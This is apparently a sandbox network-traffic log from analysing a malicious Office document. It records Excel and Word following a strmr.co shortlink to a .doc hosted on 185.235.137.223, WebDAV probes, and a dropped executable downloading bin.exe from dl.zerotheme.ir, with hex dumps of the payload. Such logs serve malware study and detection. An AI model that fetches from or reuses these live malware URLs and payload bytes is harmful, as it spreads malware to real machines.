                                                        Data Ascii: @@k@@...w@@@@@@@@@@@@@@@@@@CKCQ@@@@@@oq@@@@MwCQ@@O@@@@@@@@@@@@@@@@@@H4F@@@@@@E@@ih;;;@@@@@@K&&&SYq@@@@@@DM@@k@@Dg@@@@@@@@@@@@@@@@...+...Q@@@@...@@Io;;;g@@@@CiUmKg@@@@@@z@@&&&@@@@4@@@@@@@@@@@@@@@@@@fgU@@@@@@QCKFc@@@@@@ol&&&io@@@@@@MwCQ@@M@@@@@@
                                                        Sep 27, 2024 10:27:35.691426992 CEST1236INData Raw: 40 40 40 47 26 26 26 6e 35 52 40 40 40 40 40 40 4b 4b 69 68 61 40 40 40 40 40 40 4b 26 26 26 53 5a 2b 43 40 40 40 40 40 40 2e 2e 2e 40 40 49 47 62 31 51 40 40 40 40 40 40 6f 6c 26 26 26 67 73 48 4b 46 73 40 40 40 40 40 40 6f 6c 26 26 26 69 6f 44
                                                        Data Ascii: @@@G&&&n5R@@@@@@KKiha@@@@@@K&&&SZ+C@@@@@@...@@IGb1Q@@@@@@ol&&&gsHKFs@@@@@@ol&&&ioDM@@M@@))Q@@@@@@@@@@@@@@@@...+cg@@@@...I@@N@@@@@@EfnI@@@@@@S@@Dg@@@@...CD///9/g@@s@@@@@@Qg@@@@@@@@gI@@M@@@@@@EFigG@@Q@@Gg@@0@@@@@@QWK@@Y...@@@@Yl&&&o@@O@@@@@@EKL8
                                                        Sep 27, 2024 10:27:35.691438913 CEST1236INData Raw: 2e 45 45 47 46 38 35 2e 2e 2e 40 40 49 40 40 40 40 2e 2e 2e 68 46 40 40 51 40 40 40 40 40 40 50 62 2f 2f 2f 38 58 4c 51 62 51 4b 51 40 40 40 40 2e 2e 2e 69 59 6f 26 26 26 77 45 40 40 2e 2e 2e 69 55 6d 45 77 55 65 4b 4f 55 40 40 40 40 40 40 59 6c
                                                        Data Ascii: .EEGF85...@@I@@@@...hF@@Q@@@@@@Pb///8XLQbQKQ@@@@...iYo&&&wE@@...iUmEwUeKOU@@@@@@Yl&&&hMG...hEGFh4o0w@@@@...iUm&&&hEFEQYofQ@@@@...h4o5Q@@@@...iUmEwcGEQcWHij))@@@@@@G&&&hc))C...EHExYWExcrI...EWEReREwkRCSwPHEU...@@@@@@@@9v///xY))CCseERcXW...MXERc
                                                        Sep 27, 2024 10:27:35.691452026 CEST896INData Raw: 50 66 67 34 40 40 40 40 40 40 51 52 46 2e 2e 2e 59 52 45 79 68 48 40 40 40 40 40 40 47 45 52 4d 52 45 69 2f 57 48 45 55 2e 2e 2e 40 40 40 40 40 40 40 40 39 76 2f 2f 2f 33 34 4f 40 40 40 40 40 40 45 44 40 40 67 73 45 52 70 46 40 40 51 40 40 40 40
                                                        Data Ascii: Pfg4@@@@@@QRF...YREyhH@@@@@@GERMREi/WHEU...@@@@@@@@9v///34O@@@@@@ED@@gsERpF@@Q@@@@@@Pb///8IK&&&4@@@@@@Yq...igK@@Q@@G&&&SYGKOk@@@@@@ZZ1Cjl@@@@@@G&&&SY))FQYRFRYRFSi;;;@@@@@@G&&&SZpKNM@@@@@@Yl&&&iYRFSo@@@@@@@@DM@@k@@Kw@@@@@@@@@@@@@@@@@@olg@@@@...
                                                        Sep 27, 2024 10:27:35.696389914 CEST1236INData Raw: 40 40 6f 6c 26 26 26 71 49 72 45 68 45 48 46 69 6a 67 40 40 40 40 40 40 47 26 26 26 53 59 6f 4d 67 40 40 40 40 43 69 55 6d 6f 68 63 29 29 43 43 73 5a 45 51 63 52 43 2e 2e 2e 45 46 45 51 67 58 57 5a 70 76 61 67 40 40 40 40 43 69 55 6d 6f 68 45 49
                                                        Data Ascii: @@ol&&&qIrEhEHFijg@@@@@@G&&&SYoMg@@@@CiUmohc))CCsZEQcRC...EFEQgXWZpvag@@@@CiUmohEIF1g))C...EIEQYy4RtF@@Q@@@@@@Pb///9+UQ@@@@Cgdvaw@@@@CiUmEQcGF3Ns@@@@@@KEwkRCW9t@@@@@@K&&&SY))ChEKfm4@@@@@@pvbw@@@@ChEGFzEMEQp+c@@@@@@Cm9v@@@@@@KEQYYMQwRCn5x@@@@@@


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249163104.21.64.884433188C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:14 UTC321OUTGET /Bg7UYE HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: strmr.co
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:27:14 UTC970INHTTP/1.1 302 Found
                                                        Date: Fri, 27 Sep 2024 08:27:14 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 196
                                                        Connection: close
                                                        location: http://185.235.137.223/90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        vary: Accept
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 0
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Ducn%2FW7LLWiCmsUViurtDTyHyfaIhuBpbGumme%2FumQ3B%2F%2Bg84L0cWchn%2FGWvzR7hie9BkW2etlNl9dsnlsQsl8LbS8aLSFEtR%2BYr0lEIVQJC8L%2FClO0kzDNhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d082fe77cf6-EWR
                                                        2024-09-27 08:27:14 UTC196INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 38 35 2e 32 33 35 2e 31 33 37 2e 32 32 33 2f 39 30 2f 6e 69 2f 76 65 72 79 6e 69 63 65 70 72 6f 6a 65 63 74 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 65 6e 74 69 72 65 6e 69 63 65 77 6f 72 64 77 69 74 68 65 76 65 72 79 6f 6e 65 74 6f 65 74 6d 65 6e 69 63 65 74 68 69 6e 67 73 74 6f 67 65 74 6d 65 62 61 63 6b 77 69 74 68 6e 65 77 70 65 72 73 6f 6e 74 6f 62 65 67 72 65 61 74 5f 5f 5f 5f 5f 5f 73 65 65 74 68 65 6e 69 63 65 77 6f 72 6c 64 6f 66 2e 64 6f 63
                                                        Data Ascii: Found. Redirecting to http://185.235.137.223/90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249165104.21.64.884433496C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:21 UTC130OUTOPTIONS / HTTP/1.1
                                                        User-Agent: Microsoft Office Protocol Discovery
                                                        Host: strmr.co
                                                        Content-Length: 0
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:27:21 UTC792INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:27:21 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        allow: GET,HEAD
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hr4fzO0FhyeO%2BhvxqwOz9l37Yd6T3H4%2FWcMsQyJiQ2Go9DEK02KdY3QNjoG4fzGFQIJ9S6yFVXDe6ERR4ONcLam3BzUuJFSWqfAVJpB3yYxCzOFjTIcK2BBfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d32abde78d0-EWR
                                                        2024-09-27 08:27:21 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                        Data Ascii: 8GET,HEAD
                                                        2024-09-27 08:27:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249166104.21.64.884433496C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:23 UTC115OUTHEAD /Bg7UYE HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Microsoft Office Existence Discovery
                                                        Host: strmr.co
                                                        2024-09-27 08:27:24 UTC974INHTTP/1.1 302 Found
                                                        Date: Fri, 27 Sep 2024 08:27:24 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 196
                                                        Connection: close
                                                        location: http://185.235.137.223/90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        vary: Accept
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jSSYq6jxH0WjBH3%2BzvyUupnSK9csE%2Fh8OsDzeZIWr5a4CS8xrSCaMkFltj3jF0K3Rpm3MxuqQGDo1JvFIKmA0Rl3YhPBnpGBI%2B2Uf7Lh9tlHlPv50gQVYtXOoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d42acb61851-EWR


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.2249167104.21.64.88443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:28 UTC125OUTOPTIONS / HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                        translate: f
                                                        Host: strmr.co
                                                        2024-09-27 08:27:28 UTC792INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:27:28 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        allow: GET,HEAD
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iO6jqaxWUjQogKcLMGwaMudj7Yknsk0%2FCAEnVUv2oPJqU3dT34VzV1G3Oouwwc4fswfSP5mZu4cY1EWkaXFj1C8heuWGl8ye9N56svdm56y47pRU%2BLqhAzEbyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d5e9c7e8ccc-EWR
                                                        2024-09-27 08:27:28 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                        Data Ascii: 8GET,HEAD
                                                        2024-09-27 08:27:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.2249168104.21.64.88443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:29 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 74 72 6d 72 2e 63 6f 0d 0a 0d 0a
                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: strmr.co
                                                        2024-09-27 08:27:30 UTC825INHTTP/1.1 404 Not Found
                                                        Date: Fri, 27 Sep 2024 08:27:29 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        content-security-policy: default-src 'none'
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJy05dMo0igFOolpdvbbqwB4JGkG7qnDsNNYYzikbVqyvuCmVXyv64piEX2N5KN0nxF4vlOweaT6VfyjwqIx5cQh%2B5EBseeCUMBdbzKxuSpds98ade7saeH8oQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d669aa3c47f-EWR
                                                        2024-09-27 08:27:30 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                        2024-09-27 08:27:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.2249169104.21.64.88443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:30 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 74 72 6d 72 2e 63 6f 0d 0a 0d 0a
                                                        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: strmr.co
                                                        2024-09-27 08:27:30 UTC827INHTTP/1.1 404 Not Found
                                                        Date: Fri, 27 Sep 2024 08:27:30 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        content-security-policy: default-src 'none'
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GrX7Gnp1QGg7zkIEzzwlfPNbFY7ITEHCAG5vi9ac%2BDG8Qn1HapxL770bso0WaZhLO8f9X4W0HO7O1I0UnRUQy%2FjnZMYPz4XNaolIw2kz1rwHc7Bk2NMeDWeHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d6c799a4204-EWR
                                                        2024-09-27 08:27:30 UTC150INData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: 90<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                        2024-09-27 08:27:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.2249170104.21.64.884433496C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:32 UTC134OUTHEAD /Bg7UYE HTTP/1.1
                                                        User-Agent: Microsoft Office Existence Discovery
                                                        Host: strmr.co
                                                        Content-Length: 0
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:27:32 UTC976INHTTP/1.1 302 Found
                                                        Date: Fri, 27 Sep 2024 08:27:32 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 196
                                                        Connection: close
                                                        location: http://185.235.137.223/90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doc
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        vary: Accept-Encoding
                                                        vary: Accept
                                                        x-content-type-options: nosniff
                                                        x-dns-prefetch-control: off
                                                        x-download-options: noopen
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j40mJeeDWuUzK7Bvb4So%2BcwmNPpPRBzXQPRgXHGlxNasUsJ6PDBo%2BEyImL%2F7uomLR3fSoOpO4P3FYoS1BbS0SL0nFe9AcisglaYTS%2BEP1AzlgtlkhISkv2F0PA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c9a1d75db865e65-EWR


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.2249173185.18.213.204434016C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:27:41 UTC89OUTGET /kokorila/cgl-bin/bin.exe HTTP/1.1
                                                        Host: dl.zerotheme.ir
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:27:41 UTC207INHTTP/1.1 200 OK
                                                        Connection: close
                                                        content-type: application/x-msdownload
                                                        last-modified: Thu, 26 Sep 2024 05:27:52 GMT
                                                        accept-ranges: bytes
                                                        content-length: 286208
                                                        date: Fri, 27 Sep 2024 08:27:41 GMT
                                                        2024-09-27 08:27:41 UTC16384INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 17 50 af 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 4c 04 00 00 00 00 00 00 00 00 00 30 15 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00
                                                        Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELPYL0`@
                                                        2024-09-27 08:27:41 UTC16384INData Raw: 82 7a 3b 10 9f 97 53 0a 6b 45 5d b1 04 06 3b ca 23 c4 b1 63 4d 37 18 b7 40 c9 ce 82 ca 0a 99 92 9b c1 92 48 ab ad f2 93 e9 c1 7e 2f 98 4e 21 49 40 ae f9 49 7d da ac 13 4e a0 ab f4 10 30 64 ce 0f 4b 9d 1b ed 00 36 7a 08 95 5d 00 aa 28 35 e4 5a 42 a4 f5 83 c4 1b d1 5c 8e df f6 05 30 b6 c6 8b 75 d6 88 07 9f 53 9f 9b bd 1c 05 21 c6 5a ee a8 9b b4 45 e6 cd de bf 78 08 00 fe 99 16 8b d1 0e 35 e4 d7 91 41 e4 ef f7 1b df 30 ae dd 35 d0 21 8c f6 0b 4b ff dd 1d 99 ad 13 0e 8b 2c a9 d0 56 6e d4 bd 32 6f 26 0c 79 d3 f8 ec 7e 79 db b6 6a a8 92 c9 8a 59 e4 ab ac 25 eb db 55 a6 49 15 24 35 62 59 74 64 87 4b c5 d8 fe 31 fd 50 39 e8 e0 44 60 7d 8a 7b de 5f a9 e6 8c ca 7c f2 55 5b 78 12 88 aa 06 f6 06 3b 7a a2 79 d7 9a 59 8c 6b a8 80 e3 da 4e 31 0c 17 b3 de f7 00 42 b8 60
                                                        Data Ascii: z;SkE];#cM7@H~/N!I@I}N0dK6z](5ZB\0uS!ZEx5A05!K,Vn2o&y~yjY%UI$5bYtdK1P9D`}{_|U[x;zyYkN1B`
                                                        2024-09-27 08:27:42 UTC16384INData Raw: 47 b6 02 c6 fa 61 87 56 c2 2f a8 ac 65 92 ec ee a2 7e 1f 14 1f 31 5c 71 2b 86 50 26 84 e8 95 97 c4 ca 76 b2 9e 9b 63 33 59 12 62 dc 6f 3a 71 54 a4 ca e3 a0 a1 51 a0 19 4f 13 ca f5 f7 b1 ea 9a 6f db f0 fa dc 2b 3c de f5 ee 0c 6c 3a 80 41 2b 4e 65 96 2c be 59 a2 9b a5 20 3e 43 d9 84 a9 1f c0 c4 80 fa 6e 50 d0 0e 9e 34 ab c8 1c f8 80 21 33 48 f9 0d 1a 41 91 4b 8a 7f 47 be c1 71 6b 4b e7 7c 8a 2d b2 2e 00 e2 e2 3d e1 8e ce 2f 83 b0 9f 1b ea c3 45 2b 10 7c 23 34 41 eb e5 a6 22 d2 8a 0b 43 6f a5 0a e3 43 79 fe 30 4f cd 65 e1 e2 29 b7 e6 24 29 90 37 65 50 d1 59 61 b9 75 d2 91 6a 62 1f 69 0a 89 76 93 e7 f5 a5 a7 8e 46 d8 15 fa 02 1c 9a 22 45 d0 d6 36 69 b6 cf 44 ce ac 9a 9b c3 cf 2a 3b 39 7b 5c bc 7c 0a f3 bc d2 7b dd 9b 61 90 0b 5f 92 d5 f5 8a 6f db 31 d4 b7 b2
                                                        Data Ascii: GaV/e~1\q+P&vc3Ybo:qTQOo+<l:A+Ne,Y >CnP4!3HAKGqkK|-.=/E+|#4A"CoCy0Oe)$)7ePYaujbivF"E6iD*;9{\|{a_o1
                                                        2024-09-27 08:27:42 UTC16384INData Raw: e6 61 cb a4 4a a8 0d 00 41 fb 98 4e 3f 72 48 c8 e7 1e 6e d5 9a 84 72 b5 21 7f 3b 24 22 1c 8f a6 58 39 8d 57 5e ee 2f d3 5e d7 2a b5 a8 ef 63 1c e4 05 f6 de bc d8 d1 ec c6 4c 87 14 28 ba a2 7b 4c d7 fe ed dd d2 3c 2c 67 ab 57 54 63 a9 be 27 c7 d5 45 65 47 c6 80 52 0d 1d 8b c8 78 d4 12 7d 86 24 0f b0 8e f9 aa a3 90 ae 58 15 f2 8c 9a 9a 99 70 5e 4f 9b 93 ce 4e 49 6c be f9 97 6d 67 43 04 62 54 30 0c 44 b2 9f 32 33 29 45 05 30 36 c6 ee 40 a4 a2 5a 9b f9 12 d5 ef 03 87 30 e9 ef 9f 3a be 52 85 d1 74 bf 8c 32 ee 32 74 30 0a ac df fa 2c 36 e3 14 81 6b 63 19 e0 79 d0 cd ec bd 53 88 79 62 7b 77 b3 12 50 ff 03 8f a6 8e 70 5f 86 e8 3b f2 13 3d b5 96 d1 73 38 00 94 10 87 1a 57 d0 1f be 89 9f d7 ba c8 c5 05 31 80 f6 d9 bd e8 df 28 4f de 47 74 d8 17 21 b3 03 19 d3 ff 83
                                                        Data Ascii: aJAN?rHnr!;$"X9W^/^*cL({L<,gWTc'EeGRx}$Xp^ONIlmgCbT0D23)E06@Z0:Rt22t0,6kcySyb{wPp_;=s8W1(OGt!
                                                        2024-09-27 08:27:42 UTC16384INData Raw: d8 dc c6 74 2f 65 f5 5f e9 a8 e7 37 7a e9 35 99 4d 27 c3 e8 50 88 99 fc f7 7d 12 f8 04 c1 3c 42 f4 d9 5c 86 3c 3f 80 f1 13 2f 9f 35 28 62 38 50 5a 66 1b f3 57 07 ae 56 83 6f 10 6b 01 85 d2 03 b8 a0 3c 40 d9 9d 89 23 a4 b3 17 77 97 b8 53 cf 09 fb 87 5f 30 0b c8 e7 ec 5a f8 cd 95 59 95 0f ea 24 94 23 33 e0 f5 80 f2 5a ca fe ba c9 50 35 b8 51 da c0 fa 73 3d 5b ff 08 1c 90 4d b1 83 66 66 23 82 eb a6 28 ef f6 46 fd 73 10 61 e8 56 3b f2 7b 07 39 5f 49 c6 67 6c 4e 63 87 c6 60 c2 66 76 13 34 17 33 bf d0 5c bf 1b 3e 83 b3 82 a1 67 29 c7 c3 5d 0c a7 c1 46 06 1c 81 c8 47 b3 74 1b ab aa 67 c4 83 a7 6b eb ee 4d 02 b8 b1 f3 e5 ad 91 d5 3a a0 e8 70 50 8e c6 f6 37 7d 24 d4 ad 78 52 05 b9 d1 df 5d 3f da 42 f8 cd 48 8f 5b 42 0b 2a 28 d4 c2 77 1e 28 83 c6 18 0f 05 fc 8e 0f
                                                        Data Ascii: t/e_7z5M'P}<B\<?/5(b8PZfWVok<@#wS_0ZY$#3ZP5Qs=[Mff#(FsaV;{9_IglNc`fv43\>g)]FGtgkM:pP7}$xR]?BH[B*(w(
